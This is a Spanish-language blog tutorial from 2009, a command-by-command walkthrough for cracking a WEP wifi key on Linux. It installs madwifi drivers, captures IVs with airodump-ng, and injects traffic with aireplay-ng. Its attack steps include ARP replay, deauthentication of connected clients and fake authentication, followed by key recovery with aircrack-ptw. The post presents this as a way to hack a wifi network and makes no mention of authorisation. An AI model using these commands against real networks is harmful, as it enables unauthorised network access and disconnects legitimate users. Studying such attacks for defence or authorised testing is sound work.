- July 2010 (11)
- June 2010 (11)
- April 2010 (2)
- March 2010 (4)
- February 2010 (5)
- December 2009 (2)
- November 2009 (5)
- October 2009 (6)
- August 2009 (3)
- July 2009 (3)
- June 2009 (1)
- April 2009 (1)
- March 2009 (4)
- February 2009 (2)
- December 2008 (2)
- November 2008 (6)
- October 2008 (4)
Crack wep por comandos (terminal de linux)
Submitted by admin on Mon, 10/12/2009 - 11:01
nota aclaratoria:
unos 50000 ivs
utilizacion de aircrack-ng, airodump y aireplay
ataque de auntetificación falsa
utilizacion del terminal de linux
Hace varios años no existían tales distros lives, con las facilidades mencionadas antes y cada persona debía ingeniárselas para instalarse todo tipo de programas en el ordenador en su debian o distro Linux que utilizase para poder hackear una red wifi.
Además todo va por línea de comandos y no necesitas un script que te lo haga todo.
Es así como realmente se ven las opciones de cada comando.
Pues bien lo 1º de todo es instalar los drivers de la tarjeta wifi para poder ponerla en modo monitor y además que pueda inyectar.
En este caso yo utilicé una tarjeta con chip atheros y para ello necesitamos instalar los driver madwifi:
Lo primero es estar como root, después cerciorarnos de que nuestra tarjeta esta bien conectada para ello con la orden:
lspci | grep Atheros
Con esta orden nos muestra algo como: Atheros Communications Inc. AR5212/AR5213 Multiprotocol MAC/baseband processor (rev 01)
Actualizamos los paquetes:
apt-get update
Después hemos de instalar las 'headers' del kernel que tengamos instalado:
apt-get install linux-headers-`uname -r`
Donde uname -r nos pone automáticamente la versión del núcleo que tengamos instalada.
Instalamos las demás utilidades:
apt-get install madwifi-source
apt-get install madwifi-tools
Instalamos module-assistant:
apt-get install module-assistant
Ahora lo actualizamos:
m-a prepare
y ahora lo instalamos y compilamos:
m-a a-i madwifi
Cargamos el modulo:
modprobe ath_pci
Hacemos que se cargue permanentemente:
echo ath_pci >> /etc/modules
Vemos si todo es correcto:
iwconfig
Reiniciamos :
/etc/init.d/networking restart
Una vez tenemos la interface preparada vamos a utlizar airodump para capturar los paquetes iv necesarios para sacar la clave:
airodump-ng --ivs -w prueba -c 11 -abg ath0
La opción –ivs es para que descarte los demás tipos de paquetes y solo se interese por ivs
-c 11 para que capture lo que halla en el canal 11
-abg para que capture para todos los modos, a ,b y g
Y al final el nombre de la interfaz
Ahora mientas captura vamos a acelerar el proceso de captura de ivs con aireplay:
aireplay-ng -3 -b [bssid] -h [mac del cliente] ath0
Aireplay también tiene la opcion de desautentificar a un cliente conectado (puede ser utilizado para conseguir el handshake para wpa, o para generar ivs en wep)
aireplay-ng -0 5 -a [bssid] -c [mac del cliente que desconectamos] ath0
En caso de que no hubiera clientes el ataque cambia:
aireplay-ng -1 0 -e [essid] -a [bssid] -h [mac falsa (la nuestra)] ath0
Una vez que conseguimos acelerar la captura de ivs solo queda esperar hasta conseguir unos 50000 ivs y entonces utlizar aircrack:
Aircrack-ptw [ruta del archivo.cap]
